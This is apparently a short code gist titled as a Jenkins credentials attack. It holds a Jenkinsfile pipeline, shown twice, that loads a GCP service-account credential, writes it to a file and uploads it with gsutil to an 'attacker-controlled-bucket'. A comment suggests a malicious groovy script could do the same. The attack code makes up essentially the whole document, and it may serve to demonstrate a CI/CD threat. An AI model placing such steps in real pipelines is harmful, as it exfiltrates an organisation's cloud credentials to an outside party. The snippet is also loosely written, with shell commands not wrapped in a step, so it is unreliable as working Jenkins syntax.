kbroughton/jenkins_credentials_attack.groovy

## jenkins_credentials_attack.groovy
Jenkinsfile (Pipeline with credentials management)
pipeline {
  environment {
  credentials = credentials('jenkins-gcp-service-account')
  }
  stages {
    stage('Example stage 1') {
     steps {
     // use the credentials to upload to a Storage Bucket or
      // push to gcr.io owned by company
      // OR execute a malicious groovy script that does this
      cat $credentials > credentials.txt
     gsutil cp credentials.txt gs://attacker-controlled-bucket/
     }
    }
  }
}
	Jenkinsfile (Pipeline with credentials management)
	pipeline {
	environment {
	credentials = credentials('jenkins-gcp-service-account')
	}
	stages {
	stage('Example stage 1') {
	steps {
	// use the credentials to upload to a Storage Bucket or
	// push to gcr.io owned by company
	// OR execute a malicious groovy script that does this
	cat $credentials > credentials.txt
	gsutil cp credentials.txt gs://attacker-controlled-bucket/
	}
	}
	}
	}